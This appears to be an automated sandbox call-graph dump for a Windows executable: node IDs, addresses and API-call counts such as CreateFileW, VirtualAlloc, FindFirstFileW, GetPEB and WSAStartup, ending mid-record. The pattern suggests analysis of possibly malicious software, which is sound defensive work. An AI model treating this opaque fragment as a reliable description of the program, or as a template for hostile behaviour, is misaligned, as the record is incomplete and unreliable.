4 API calls 10156->10157 10161 410c15 10157->10161 10158 410c4e 10159 405762 4 API calls 10158->10159 10160 410c60 10159->10160 10160->10148 10162 403f9e 5 API calls 10160->10162 10161->10158 10168 405e5a 10161->10168 10162->10148 10165 4040bb 12 API calls 10166 410c44 10165->10166 10167 402bab 2 API calls 10166->10167 10167->10158 10169 402b7c 2 API calls 10168->10169 10171 405e72 10169->10171 10170 405ea3 10170->10158 10170->10165 10171->10170 10172 4031e5 4 API calls 10171->10172 10173 405e94 10172->10173 10173->10170 10174 402bab 2 API calls 10173->10174 10174->10170 10175 40f81c 10176 404bee 6 API calls 10175->10176 10177 40f833 10176->10177 10178 404bee 6 API calls 10177->10178 10191 40f94f 10177->10191 10179 40f85c 10178->10179 10180 404bee 6 API calls 10179->10180 10181 40f86b 10180->10181 10182 404bee 6 API calls 10181->10182 10183 40f87a 10182->10183 10184 404bee 6 API calls 10183->10184 10185 40f888 10184->10185 10186 404ba7 4 API calls 10185->10186 10187 40f897 10186->10187 10188 405872 4 API calls 10187->10188 10187->10191 10189 40f8d8 10188->10189 10190 405872 4 API calls 10189->10190 10192 40f8ea 10190->10192 10193 405872 4 API calls 10192->10193 10194 40f8fa 10193->10194 10195 405872 4 API calls 10194->10195 10196 40f90c 10195->10196 10197 405781 4 API calls 10196->10197 10198 40f91d 10197->10198 10199 4040bb 12 API calls 10198->10199 10200 40f92d 10199->10200 10201 405762 4 API calls 10200->10201 10202 40f93f 10201->10202 10202->10191 10203 403f9e 5 API calls 10202->10203 10203->10191 9514 402c1f 9515 4031e5 4 API calls 9514->9515 9516 402c31 LoadLibraryW 9515->9516 10213 407e1f 10215 407e2c 10213->10215 10224 407e61 10213->10224 10214 407ea6 10216 407eb6 10214->10216 10219 402bab 2 API calls 10214->10219 10218 407e3e 10215->10218 10220 402bab 2 API calls 10215->10220 10222 407e51 10215->10222 10216->10222 10223 402bab 2 API calls 10216->10223 10217 407ed4 10218->10217 10221 402bab 2 API calls 10218->10221 10219->10216 10220->10218 10221->10222 10222->10217 10226 402bab 2 API calls 10222->10226 10223->10222 10224->10214 10224->10216 10225 405872 4 API calls 10224->10225 10227 407e86 10225->10227 10226->10217 10228 405872 4 API calls 10227->10228 10229 407e96 10228->10229 10230 405872 4 API calls 10229->10230 10230->10214 9529 405924 9530 4031e5 4 API calls 9529->9530 9531 405937 StrStrW 9530->9531 10239 410927 10240 4044ee 7 API calls 10239->10240 10241 41093d 10240->10241 10242 4056bf 2 API calls 10241->10242 10253 4109a4 10241->10253 10245 410954 10242->10245 10243 4044ee 7 API calls 10243->10245 10245->10243 10246 410990 10245->10246 10247 402bab 2 API calls 10245->10247 10254 41080e 10245->10254 10248 413aca 4 API calls 10246->10248 10247->10245 10249 410998 10248->10249 10250 405695 2 API calls 10249->10250 10251 41099e 10250->10251 10252 402bab 2 API calls 10251->10252 10252->10253 10255 410821 10254->10255 10265 41091f 10255->10265 10266 410701 10255->10266 10258 405872 4 API calls 10259 410900 10258->10259 10260 405872 4 API calls 10259->10260 10261 41090d 10260->10261 10262 405872 4 API calls 10261->10262 10263 410919 10262->10263 10264 402bab 2 API calls 10263->10264 10264->10265 10265->10245 10267 405f08 4 API calls 10266->10267 10269 410713 10267->10269 10268 410804 10268->10258 10268->10265 10269->10268 10270 402b7c 2 API calls 10269->10270 10272 410748 10270->10272 10271 402bab 2 API calls 10271->10268 10273 402b7c 2 API calls 10272->10273 10275 4107fd 10272->10275 10276 4107ad 10273->10276 10274 402bab 2 API calls 10274->10275 10275->10271 10276->10274 10277 40d726 10278 404bee 6 API calls 10277->10278 10279 40d73f 10278->10279 10280 405872 4 API calls 10279->10280 10292 40db63 10279->10292 10283 40d761 10280->10283 10281 404bee 6 API calls 10281->10283 10282 405872 4 API calls 10282->10283 10283->10281 10283->10282 10285 40d971 10283->10285 10284 404ba7 4 API calls 10284->10285 10285->10284 10286 405781 4 API calls 10285->10286 10291 40d9bb 10285->10291 10286->10285 10287 404c4e 6 API calls 10287->10291 10288 405781 4 API calls 10288->10291 10289 4037be 4 API calls 10289->10291 10290 405872 4 API calls 10290->10291 10291->10287 10291->10288 10291->10289 10291->10290 10291->10292 9587 40f12f 9588 41219c 14 API calls 9587->9588 9589 40f13f 9588->9589 9590 41219c 14 API calls 9589->9590 9591 40f14c 9590->9591 9592 41219c 14 API calls 9591->9592 9593 40f159 9592->9593 9594 41219c 14 API calls 9593->9594 9595 40f166 9594->9595 9602 40ed35 9603 4056bf 2 API calls 9602->9603 9604 40ed42 9603->9604 9605 412093 20 API calls 9604->9605 9606 40ed63 9605->9606 9607 412093 20 API calls 9606->9607 9608 40ed73 9607->9608 9609 413aca 4 API calls 9608->9609 9610 40ed80 9609->9610 9611 405695 2 API calls 9610->9611 9612 40ed8e 9611->9612 8056 40f3c5 8061 41219c 8056->8061 8059 41219c 14 API calls 8060 40f3e1 8059->8060 8062 4121b1 8061->8062 8078 40f3d3 8061->8078 8063 4121be 8062->8063 8067 4121c5 8062->8067 8109 413ba4 8063->8109 8065 4121ca 8079 404056 8065->8079 8067->8065 8072 412210 8067->8072 8068 4121c3 8068->8078 8086 405b6f 8068->8086 8071 41224d 8076 402bab 2 API calls 8071->8076 8071->8078 8072->8078 8114 403fbf 8072->8114 8076->8078 8078->8059 8125 402b7c GetProcessHeap RtlAllocateHeap 8079->8125 8081 404066 8083 404095 8081->8083 8127 4031e5 8081->8127 8083->8068 8085 402bab 2 API calls 8085->8083 8087 405b7d 8086->8087 8088 402b7c 2 API calls 8087->8088 8089 405b99 8088->8089 8098 405c02 8089->8098 8163 4059b8 8089->8163 8091 405c09 8093 402bab 2 API calls 8091->8093 8092 405bba 8092->8091 8094 402b7c 2 API calls 8092->8094 8093->8098 8095 405bdd 8094->8095 8095->8091 8096 405be4 8095->8096 8097 402bab 2 API calls 8096->8097 8097->8098 8098->8071 8099 413a58 8098->8099 8100 413a63 8099->8100 8108 412245 8099->8108 8100->8108 8166 405781 8100->8166 8103 405781 4 API calls 8104 413aa0 8103->8104 8169 4057df 8104->8169 8107 405781 4 API calls 8107->8108 8122 402bab 8108->8122 8110 413bad 8109->8110 8111 404056 6 API calls 8110->8111 8113 413bb8 8110->8113 8112 413bc5 8111->8112 8112->8068 8113->8068 8115 402b7c 2 API calls 8114->8115 8116 403fcf 8115->8116 8121 403ff4 8116->8121 8288 403b98 8116->8288 8119 403ff8 GetLastError 8120 402bab 2 API calls 8119->8120 8120->8121 8121->8068 8123 402bb4 GetProcessHeap HeapFree 8122->8123 8124 402bc6 8122->8124 8123->8124 8124->8071 8126 402b98 8125->8126 8126->8081 8128 4031f3 8127->8128 8129 403236 8127->8129 8128->8129 8132 403208 8128->8132 8138 4030a5 8129->8138 8131 403224 8134 403258 8131->8134 8136 4031e5 4 API calls 8131->8136 8144 403263 8132->8144 8134->8083 8134->8085 8135 40320d 8135->8134 8137 4030a5 4 API calls 8135->8137 8136->8134 8137->8131 8150 402ca4 8138->8150 8140 4030b5 8140->8131 8141 4030b0 8141->8140 8154 4030c4 8141->8154 8145 40326d 8144->8145 8146 402b7c 2 API calls 8145->8146 8149 4032b7 8145->8149 8147 40328c 8146->8147 8148 402b7c 2 API calls 8147->8148 8148->8149 8149->8135 8151 403079 8150->8151 8153 40307c 8151->8153 8158 40317b GetPEB 8151->8158 8153->8141 8155 4030eb 8154->8155 8157 4030c0 8155->8157 8160 402c03 8155->8160 8157->8131 8159 40319b 8158->8159 8159->8153 8161 4031e5 3 API calls 8160->8161 8162 402c15 GetProcAddress 8161->8162 8162->8157 8164 4031e5 4 API calls 8163->8164 8165 4059cb 8164->8165 8165->8092 8184 405797 8166->8184 8168 405792 8168->8103 8170 4057eb 8169->8170 8183 405832 8169->8183 8170->8183 8194 4040bb 8170->8194 8173 405853 8232 405762 8173->8232 8174 405839 8174->8173 8221 405627 8174->8221 8175 40582c 8218 403f9e 8175->8218 8182 403f9e 5 API calls 8182->8183 8183->8107 8183->8108 8185 4057a1 8184->8185 8186 4057bd 8184->8186 8185->8186 8188 4056fc 8185->8188 8186->8168 8189 405714 8188->8189 8190 402b7c 2 API calls 8189->8190 8192 405730 8190->8192 8191 405752 8191->8186 8192->8191 8193 402bab 2 API calls 8192->8193 8193->8191 8195 4031e5 4 API calls 8194->8195 8196 4040d5 CreateFileW 8195->8196 8197 4040f8 8196->8197 8198 40418d 8196->8198 8199 4031e5 4 API calls 8197->8199 8209 404183 8198->8209 8238 403c90 8198->8238 8205 404105 8199->8205 8203 40416d 8235 403c40 8203->8235 8205->8203 8210 4031e5 4 API calls 8205->8210 8207 4040bb 9 API calls 8213 4041c8 8207->8213 8208 402bab 2 API calls 8208->8209 8209->8174 8209->8175 8209->8183 8211 404131 VirtualAlloc 8210->8211 8211->8203 8212 404142 8211->8212 8214 4031e5 4 API calls 8212->8214 8213->8208 8215 40414f ReadFile 8214->8215 8215->8203 8216 404160 8215->8216 8217 4031e5 4 API calls 8216->8217 8217->8203 8219 4031e5 4 API calls 8218->8219 8220 403fb1 VirtualFree 8219->8220 8220->8183 8222 4031e5 4 API calls 8221->8222 8223 40563a 8222->8223 8224 405872 8223->8224 8226 405881 8224->8226 8225 4058bc 8228 405797 4 API calls 8225->8228 8229 4058af 8225->8229 8226->8225 8285 4058d4 8226->8285 8228->8229 8229->8173 8231 405781 4 API calls 8231->8225 8233 405781 4 API calls 8232->8233 8234 405770 8233->8234 8234->8182 8236 4031e5 4 API calls 8235->8236 8237 403c52 CloseHandle 8236->8237 8237->8209 8239 403ca3 8238->8239 8240 403caa 8238->8240 8265 405dc5 8239->8265 8241 404056 6 API calls 8240->8241 8244 403d3a 8240->8244 8243 403cbe 8241->8243 8245 403d2e 8243->8245 8246 403d17 8243->8246 8247 403ccf 8243->8247 8244->8209 8261 403c59 8244->8261 8245->8244 8250 402bab 2 API calls 8245->8250 8248 405b6f 6 API calls 8246->8248 8249 405b6f 6 API calls 8247->8249 8260 403d14 8248->8260 8251 403cdd 8249->8251 8250->8244 8252 405b6f 6 API calls 8251->8252 8254 403cee 8252->8254 8253 402bab 2 API calls 8253->8245 8254->8260 8270 403d4d 8254->8270 8257 403d0b 8258 402bab 2 API calls 8257->8258 8258->8260 8260->8253 8262 403c21 8261->8262 8263 4031e5 4 API calls 8262->8263 8264 403c33 8263->8264 8264->8207 8264->8213 8279 406799 8265->8279 8267 405dd5 8268 402b7c 2 API calls 8267->8268 8269 405dfe 8268->8269 8269->8240 8282 403bb7 8270->8282 8272 403cfe 8272->8257 8273 403c62 8272->8273 8274 403d4d 5 API calls 8273->8274 8275 403c6d 8274->8275 8276 403c72 8275->8276 8277 4031e5 4 API calls 8275->8277 8276->8257 8278 403c87 CreateDirectoryW 8277->8278 8278->8257 8280 4031e5 4 API calls 8279->8280 8281 4067ad 8280->8281 8281->8267 8283 4031e5 4 API calls 8282->8283 8284 403bc9 GetFileAttributesW 8283->8284 8284->8272 8286 405797 4 API calls 8285->8286 8287 4058a8 8286->8287 8287->8229 8287->8231 8289 4031e5 4 API calls 8288->8289 8290 403baa 8289->8290 8290->8119 8290->8121 9727 40ebc6 9728 4040bb 12 API calls 9727->9728 9729 40ebdf 9728->9729 9735 40ecd7 9729->9735 9747 407795 9729->9747 9732 40eccd 9733 403f9e 5 API calls 9732->9733 9733->9735 9734 4056bf 2 API calls 9746 40ec12 9734->9746 9736 40ecb5 9737 402bab 2 API calls 9736->9737 9738 40ecbd 9737->9738 9739 413aca 4 API calls 9738->9739 9741 40ecc7 9739->9741 9740 407908 GetProcessHeap RtlAllocateHeap 9740->9746 9742 405695 2 API calls 9741->9742 9742->9732 9744 402bab GetProcessHeap HeapFree 9744->9746 9745 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9745->9746 9746->9736 9746->9740 9746->9744 9746->9745 9758 412269 9746->9758 9748 4077ab 9747->9748 9754 4077b3 9748->9754 9765 405ae9 9748->9765 9750 4077e1 9751 407802 9750->9751 9752 4077f8 9750->9752 9750->9754 9755 402b7c 2 API calls 9751->9755 9753 402bab 2 API calls 9752->9753 9753->9754 9754->9732 9754->9734 9756 407811 9755->9756 9757 402bab 2 API calls 9756->9757 9757->9754 9781 40374e 9758->9781 9763 402bab 2 API calls 9764 412299 9763->9764 9764->9746 9766 405af7 9765->9766 9767 402b7c 2 API calls 9766->9767 9768 405b03 9767->9768 9774 405b5a 9768->9774 9778 405998 9768->9778 9770 405b21 9771 405b61 9770->9771 9773 402b7c 2 API calls 9770->9773 9772 402bab 2 API calls 9771->9772 9772->9774 9775 405b39 9773->9775 9774->9750 9775->9771 9776 405b40 9775->9776 9777 402bab 2 API calls 9776->9777 9777->9774 9779 4031e5 4 API calls 9778->9779 9780 4059ab 9779->9780 9780->9770 9782 402b7c 2 API calls 9781->9782 9783 40375f 9782->9783 9784 4031e5 4 API calls 9783->9784 9787 4037a3 9783->9787 9785 40378f 9784->9785 9786 402bab 2 API calls 9785->9786 9785->9787 9786->9787 9787->9764 9788 4037be 9787->9788 9789 4031e5 4 API calls 9788->9789 9790 4037e2 9789->9790 9791 402b7c 2 API calls 9790->9791 9797 40382b 9790->9797 9792 403802 9791->9792 9793 403832 9792->9793 9795 403809 9792->9795 9794 4036a3 4 API calls 9793->9794 9794->9797 9796 4036a3 4 API calls 9795->9796 9796->9797 9797->9763 8888 410cd1 8893 412093 8888->8893 8891 412093 20 API calls 8892 410cff 8891->8892 8894 4120a5 8893->8894 8914 410cf1 8893->8914 8897 412100 8894->8897 8898 4120b3 8894->8898 8895 404056 6 API calls 8896 4120ba 8895->8896 8899 405b6f 6 API calls 8896->8899 8912 412152 8896->8912 8896->8914 8900 403fbf 7 API calls 8897->8900 8897->8914 8898->8895 8904 412125 8899->8904 8900->8896 8903 41218c 8908 402bab 2 API calls 8903->8908 8903->8914 8906 412139 8904->8906 8907 41214d 8904->8907 8904->8912 8905 402bab 2 API calls 8905->8903 8910 402bab 2 API calls 8906->8910 8909 402bab 2 API calls 8907->8909 8908->8914 8909->8912 8911 41213e 8910->8911 8913 402bab 2 API calls 8911->8913 8915 403d74 8912->8915 8913->8914 8914->8891 8916 403d87 8915->8916 8917 403ea3 8916->8917 8918 405b6f 6 API calls 8916->8918 8919 405b6f 6 API calls 8917->8919 8920 403da3 8918->8920 8921 403eb9 8919->8921 8920->8917 8922 4031e5 4 API calls 8920->8922 8923 4031e5 4 API calls 8921->8923 8929 403f6f 8921->8929 8925 403dbc FindFirstFileW 8922->8925 8924 403ed3 FindFirstFileW 8923->8924 8940 403ee8 8924->8940 8942 403f8d 8924->8942 8936 403e9c 8925->8936 8946 403dd1 8925->8946 8926 402bab 2 API calls 8926->8929 8927 402bab 2 API calls 8927->8917 8928 4031e5 4 API calls 8930 403e84 FindNextFileW 8928->8930 8929->8903 8929->8905 8931 403e96 8930->8931 8930->8946 8955 403bef 8931->8955 8932 4031e5 4 API calls 8935 403f50 FindNextFileW 8932->8935 8934 405b6f 6 API calls 8934->8940 8938 403f87 8935->8938 8935->8940 8936->8927 8937 405b6f 6 API calls 8937->8946 8941 403bef 5 API calls 8938->8941 8939 403f75 8943 402bab 2 API calls 8939->8943 8940->8932 8940->8934 8940->8939 8948 402bab 2 API calls 8940->8948 8958 40fa23 8940->8958 8941->8942 8942->8926 8945 403f7b 8943->8945 8944 403d74 15 API calls 8944->8946 8947 403bef 5 API calls 8945->8947 8946->8928 8946->8937 8946->8944 8949 402bab 2 API calls 8946->8949 8950 403f63 8946->8950 8947->8929 8948->8940 8949->8946 8951 402bab 2 API calls 8950->8951 8952 403f69 8951->8952 8953 403bef 5 API calls 8952->8953 8953->8929 8956 4031e5 4 API calls 8955->8956 8957 403c01 FindClose 8956->8957 8957->8936 8959 40fa39 8958->8959 8960 410293 8959->8960 8961 405b6f 6 API calls 8959->8961 8960->8940 8962 40ffcc 8961->8962 8962->8960 8963 4040bb 12 API calls 8962->8963 8964 40ffeb 8963->8964 8965 41028c 8964->8965 8968 402b7c 2 API calls 8964->8968 9013 41027d 8964->9013 8966 402bab 2 API calls 8965->8966 8966->8960 8967 403f9e 5 API calls 8967->8965 8969 41001e 8968->8969 8970 40a423 4 API calls 8969->8970 8969->9013 8971 41004a 8970->8971 8972 4031e5 4 API calls 8971->8972 8973 41005c 8972->8973 8974 4031e5 4 API calls 8973->8974 8975 410079 8974->8975 8976 4031e5 4 API calls 8975->8976 8977 410096 8976->8977 8978 4031e5 4 API calls 8977->8978 8979 4100b0 8978->8979 8980 4031e5 4 API calls 8979->8980 8981 4100cd 8980->8981 8982 4031e5 4 API calls 8981->8982 8983 4100ea 8982->8983 9014 412516 8983->9014 8985 4100fd 8986 40642c 5 API calls 8985->8986 8987 41013e 8986->8987 8988 410142 8987->8988 8989 41019f 8987->8989 8990 40488c 5 API calls 8988->8990 8992 4031e5 4 API calls 8989->8992 8991 410151 8990->8991 8994 41019c 8991->8994 8995 404866 4 API calls 8991->8995 9006 4101bb 8992->9006 8993 41022a 9003 413a58 13 API calls 8993->9003 8994->8993 8996 40642c 5 API calls 8994->8996 8997 410163 8995->8997 8998 410201 8996->8998 9002 406c4c 6 API calls 8997->9002 9011 41018e 8997->9011 9000 410205 8998->9000 9001 41022f 8998->9001 8999 403c40 5 API calls 8999->8994 9004 4126a7 7 API calls 9000->9004 9017 4125db 9001->9017 9007 410178 9002->9007 9010 41026e 9003->9010 9004->8993 9008 4031e5 4 API calls 9006->9008 9009 406c4c 6 API calls 9007->9009 9008->8994 9009->9011 9012 402bab 2 API calls 9010->9012 9011->8999 9012->9013 9013->8967 9015 4031e5 4 API calls 9014->9015 9016 412539 9015->9016 9016->8985 9018 40488c 5 API calls 9017->9018 9019 4125ec 9018->9019 9020 41269f 9019->9020 9021 4031e5 4 API calls 9019->9021 9020->8993 9022 412609 9021->9022 9024 4031e5 4 API calls 9022->9024 9030 41268f 9022->9030 9023 403c40 5 API calls 9023->9020 9026 41262a 9024->9026 9025 412675 9028 4031e5 4 API calls 9025->9028 9026->9025 9034 4124f1 9026->9034 9028->9030 9030->9023 9031 412663 9033 4031e5 4 API calls 9031->9033 9032 4124f1 4 API calls 9032->9031 9033->9025 9035 4031e5 4 API calls 9034->9035 9036 412503 9035->9036 9036->9031 9036->9032 9223 4049dc 9224 4031e5 4 API calls 9223->9224 9225 4049ef 9224->9225 9880 40cddd 9881 405b6f 6 API calls 9880->9881 9882 40cdee 9881->9882 9883 40ce06 9882->9883 9884 413a58 13 API calls 9882->9884 9885 405b6f 6 API calls 9883->9885 9893 40ce59 9883->9893 9886 40ce00 9884->9886 9887 40ce1c 9885->9887 9888 402bab 2 API calls 9886->9888 9889 40ce52 9887->9889 9890 403d74 19 API calls 9887->9890 9887->9893 9888->9883 9891 402bab 2 API calls 9889->9891 9892 40ce45 9890->9892 9891->9893 9892->9889 9894 402bab 2 API calls 9892->9894 9894->9889 9226 40ecde 9227 412093 20 API calls 9226->9227 9228 40ecfd 9227->9228 9229 412093 20 API calls 9228->9229 9230 40ed0d 9229->9230 9234 40e8df 9235 412093 20 API calls 9234->9235 9236 40e8f8 9235->9236 9237 412093 20 API calls 9236->9237 9238 40e908 9237->9238 9245 404b22 9238->9245 9240 40e93d 9241 40e91c 9241->9240 9242 40e936 9241->9242 9252 40e944 9241->9252 9243 402bab 2 API calls 9242->9243 9243->9240 9246 402b7c 2 API calls 9245->9246 9248 404b33 9246->9248 9247 404b66 9247->9241 9248->9247 9261 4049b3 9248->9261 9251 402bab 2 API calls 9251->9247 9253 4056bf 2 API calls 9252->9253 9254 40e952 9253->9254 9255 4057df 13 API calls 9254->9255 9260 40e976 9254->9260 9256 40e966 9255->9256 9257 413aca 4 API calls 9256->9257 9258 40e970 9257->9258 9259 405695 2 API calls 9258->9259 9259->9260 9260->9242 9262 4031e5 4 API calls 9261->9262 9263 4049c6 9262->9263 9263->9247 9263->9251 9264 4139de 9273 413855 9264->9273 9266 4139f1 9267 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9266->9267 9272 4139f7 9267->9272 9268 413866 59 API calls 9269 413a2d 9268->9269 9270 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9269->9270 9271 413a34 9270->9271 9272->9268 9274 4031e5 4 API calls 9273->9274 9275 413864 9274->9275 9275->9275 9295 4094e7 9296 404b22 6 API calls 9295->9296 9297 4094fe 9296->9297 9298 405b6f 6 API calls 9297->9298 9303 409554 9297->9303 9299 409514 9298->9299 9300 40954d 9299->9300 9302 404b22 6 API calls 9299->9302 9301 402bab 2 API calls 9300->9301 9301->9303 9304 40952d 9302->9304 9305 409544 9304->9305 9306 409408 15 API calls 9304->9306 9307 402bab 2 API calls 9305->9307 9308 40953e 9306->9308 9307->9300 9309 402bab 2 API calls 9308->9309 9309->9305 9318 4058ea 9319 4031e5 4 API calls 9318->9319 9320 4058fd StrStrA 9319->9320 9944 40d4ea 9945 404bee 6 API calls 9944->9945 9947 40d500 9945->9947 9946 40d5a0 9947->9946 9948 404bee 6 API calls 9947->9948 9949 40d529 9948->9949 9950 404bee 6 API calls 9949->9950 9951 40d537 9950->9951 9952 404bee 6 API calls 9951->9952 9953 40d546 9952->9953 9953->9946 9954 405872 4 API calls 9953->9954 9955 40d56d 9954->9955 9956 405872 4 API calls 9955->9956 9957 40d57c 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d58e 9958->9959 9960 405872 4 API calls 9959->9960 9960->9946 9961 40a3ea 9962 40374e 6 API calls 9961->9962 9963 40a403 9962->9963 9964 40a419 9963->9964 9965 4059d8 4 API calls 9963->9965 9966 40a411 9965->9966 9967 402bab 2 API calls 9966->9967 9967->9964 9358 404df3 WSAStartup 9362 4091f6 9363 404b22 6 API calls 9362->9363 9364 40920b 9363->9364 9365 409222 9364->9365 9366 409408 15 API calls 9364->9366 9367 40921c 9366->9367 9368 402bab 2 API calls 9367->9368 9368->9365 9994 4117fe 9995 404c4e 6 API calls 9994->9995 9996 411888 9995->9996 9997 404c4e 6 API calls 9996->9997 10003 411925 9996->10003 9998 4118ab 9997->9998 9998->10003 10013 4119b3 9998->10013 10000 4118c5 10001 4119b3 4 API calls 10000->10001 10002 4118d0 10001->10002 10002->10003 10004 4056bf 2 API calls 10002->10004 10005 4118fd 10004->10005 10006 405872 4 API calls 10005->10006 10007 41190a 10006->10007 10008 405872 4 API calls 10007->10008 10009 411915 10008->10009 10010 413aca 4 API calls 10009->10010 10011 41191f 10010->10011 10012 405695 2 API calls 10011->10012 10012->10003 10014 4119c6 10013->10014 10015 4119bf 10013->10015 10016 4031e5 4 API calls 10014->10016 10015->10000 10016->10015 9372 40e880 9373 41219c 14 API calls 9372->9373 9374 40e88e 9373->9374 9375 41219c 14 API calls 9374->9375 9376 40e89c 9375->9376 10080 40e48a 10081 404bee 6 API calls 10080->10081 10083 40e4d0 10081->10083 10082 40e4f4 10083->10082 10084 405872 4 API calls 10083->10084 10084->10082 9473 410390 9474 404b22 6 API calls 9473->9474 9476 4103a5 9474->9476 9475 410409 9476->9475 9477 405b6f 6 API calls 9476->9477 9482 4103ba 9477->9482 9478 410402 9479 402bab 2 API calls 9478->9479 9479->9475 9480 4103fb 9481 402bab 2 API calls 9480->9481 9481->9478 9482->9478 9482->9480 9483 403d74 19 API calls 9482->9483 9484 4103ee 9483->9484 9484->9480 9485 402bab 2 API calls 9484->9485 9485->9480 10095 40ed96 10096 4040bb 12 API calls 10095->10096 10110 40edb0 10096->10110 10097 40ef90 10098 40ef87 10099 403f9e 5 API calls 10098->10099 10099->10097 10100 405ae9 6 API calls 10100->10110 10101 412269 6 API calls 10101->10110 10102 40ef61 10104 40ef6e 10102->10104 10106 402bab 2 API calls 10102->10106 10103 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10103->10110 10105 40ef7c 10104->10105 10107 402bab 2 API calls 10104->10107 10105->10098 10108 402bab 2 API calls 10105->10108 10106->10104 10107->10105 10108->10098 10109 402bab GetProcessHeap HeapFree 10109->10110 10110->10097 10110->10098 10110->10100 10110->10101 10110->10102 10110->10103 10110->10109 10111 40ef98 10112 404c4e 6 API calls 10111->10112 10113 40efb6 10112->10113 10122 40f02a 10113->10122 10126 40f054 10113->10126 10116 404bee 6 API calls 10117 40efda 10116->10117 10118 404bee 6 API calls 10117->10118 10119 40efe9 10118->10119 10120 405872 4 API calls 10119->10120 10119->10122 10121 40f008 10120->10121 10123 405872 4 API calls 10121->10123 10124 40f01a 10123->10124 10125 405872 4 API calls 10124->10125 10125->10122 10127 40f064 10126->10127 10128 402b7c 2 API calls 10127->10128 10130 40f072 10128->10130 10129 40efca 10129->10116 10130->10129 10132 405ecd 10130->10132 10133 4059b8 4 API calls 10132->10133 10134 405edf 10133->10134 10134->10130 9492 410c98 9493 41219c 14 API calls 9492->9493 9494 410ca8 9493->9494 9495 41219c 14 API calls 9494->9495 9496 410cb5 9495->9496 9497 412093 20 API calls 9496->9497 9498 410cc9 9497->9498 10204 41249c 10205 4056bf 2 API calls 10204->10205 10206 4124aa 10205->10206 10207 4124ce 10206->10207 10208 4057df 13 API calls 10206->10208 10209 4124be 10208->10209 10210 413aca 4 API calls 10209->10210 10211 4124c8 10210->10211 10212 405695 2 API calls 10211->10212 10212->10207 9502 40f49e 9503 40f4b6 13 API calls 9502->9503 9504 40f4a8 9503->9504 9505 40929e 9506 413b28 6 API calls 9505->9506 9507 4092a4 9506->9507 9508 405b6f 6 API calls 9507->9508 9509 4092af 9508->9509 9510 409408 15 API calls 9509->9510 9513 4092c5 9509->9513 9511 4092bf 9510->9511 9512 402bab 2 API calls 9511->9512 9512->9513 10231 407fa4 10232 407fb7 10231->10232 10233 402b7c 2 API calls 10232->10233 10235 407fee 10232->10235 10234 40800d 10233->10234 10234->10235 10236 4037be 4 API calls 10234->10236 10237 40803c 10236->10237 10238 402bab 2 API calls 10237->10238 10238->10235 9550 4090aa 9551 404b22 6 API calls 9550->9551 9552 4090c1 9551->9552 9553 409408 15 API calls 9552->9553 9560 4090d8 9552->9560 9555 4090d2 9553->9555 9554 404b22 6 API calls 9556 4090eb 9554->9556 9558 402bab 2 API calls 9555->9558 9557 409104 9556->9557 9559 408c4d 15 API calls 9556->9559 9558->9560 9561 4090fe 9559->9561 9560->9554 9562 402bab 2 API calls 9561->9562 9562->9557 9569 409cae 9584 404b79 9569->9584 9571 409d2f 9572 409cc5 9572->9571 9573 409d27 9572->9573 9575 405b6f 6 API calls 9572->9575 9574 402bab 2 API calls 9573->9574 9574->9571 9576 409cec 9575->9576 9576->9573 9577 404b79 6 API calls 9576->9577 9578 409d05 9577->9578 9579 409d1e 9578->9579 9580 408c4d 15 API calls 9578->9580 9581 402bab 2 API calls 9579->9581 9582 409d18 9580->9582 9581->9573 9583 402bab 2 API calls 9582->9583 9583->9579 9585 404b22 6 API calls 9584->9585 9586 404b8a 9585->9586 9586->9572 10298 411fb3 10299 405b6f 6 API calls 10298->10299 10301 412013 10299->10301 10300 412075 10301->10300 10302 41206a 10301->10302 10317 411a8d 10301->10317 10304 402bab 2 API calls 10302->10304 10304->10300 10306 4056bf 2 API calls 10307 41203d 10306->10307 10308 405872 4 API calls 10307->10308 10309 41204a 10308->10309 10310 413aca 4 API calls 10309->10310 10311 412054 10310->10311 10312 405695 2 API calls 10311->10312 10313 41205a 10312->10313 10314 413a58 13 API calls 10313->10314 10315 412064 10314->10315 10316 402bab 2 API calls 10315->10316 10316->10302 10318 402b7c 2 API calls 10317->10318 10319 411aa3 10318->10319 10327 411f05 10319->10327 10340 404ada 10319->10340 10322 404ada 4 API calls 10323 411cad 10322->10323 10324 411f0c 10323->10324 10326 411cc0 10323->10326 10325 402bab 2 API calls 10324->10325 10325->10327 10343 405eb6 10326->10343 10327->10302 10327->10306 10329 411d3c 10330 4031e5 4 API calls 10329->10330 10338 411d7b 10330->10338 10331 411ea6 10332 4031e5 4 API calls 10331->10332 10333 411eb5 10332->10333 10334 4031e5 4 API calls 10333->10334 10335 411ed6 10334->10335 10336 405eb6 4 API calls 10335->10336 10336->10327 10337 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10337->10338 10338->10331 10338->10337 10339 405eb6 4 API calls 10338->10339 10339->10338 10341 4031e5 4 API calls 10340->10341 10342 404afd 10341->10342 10342->10322 10344 405998 4 API calls 10343->10344 10345 405ec8 10344->10345 10345->10329 9616 40f6b8 9617 41219c 14 API calls 9616->9617 9618 40f6c7 9617->9618 9619 41219c 14 API calls 9618->9619 9620 40f6d5 9619->9620 9621 41219c 14 API calls 9620->9621 9622 40f6df 9621->9622 9641 40d6bd 9642 4056bf 2 API calls 9641->9642 9643 40d6c9 9642->9643 9654 404cbf 9643->9654 9646 404cbf 8 API calls 9647 40d6f4 9646->9647 9648 404cbf 8 API calls 9647->9648 9649 40d702 9648->9649 9650 413aca 4 API calls 9649->9650 9651 40d711 9650->9651 9652 405695 2 API calls 9651->9652 9653 40d71f 9652->9653 9655 402b7c 2 API calls 9654->9655 9656 404ccd 9655->9656 9657 404ddc 9656->9657 9658 404b8f 5 API calls 9656->9658 9657->9646 9659 404ce4 9658->9659 9660 404dd4 9659->9660 9662 402b7c 2 API calls 9659->9662 9661 402bab 2 API calls 9660->9661 9661->9657 9669 404d04 9662->9669 9663 404dcc 9664 404a39 5 API calls 9663->9664 9664->9660 9665 404dc6 9666 402bab 2 API calls 9665->9666 9666->9663 9667 402b7c 2 API calls 9667->9669 9668 404b8f 5 API calls 9668->9669 9669->9663 9669->9665 9669->9667 9669->9668 9670 404a39 5 API calls 9669->9670 9671 405b6f 6 API calls 9669->9671 9672 404cbf 8 API calls 9669->9672 9673 402bab GetProcessHeap HeapFree 9669->9673 9670->9669 9671->9669 9672->9669 9673->9669 9674 40f0bf 9675 4056bf 2 API calls 9674->9675 9676 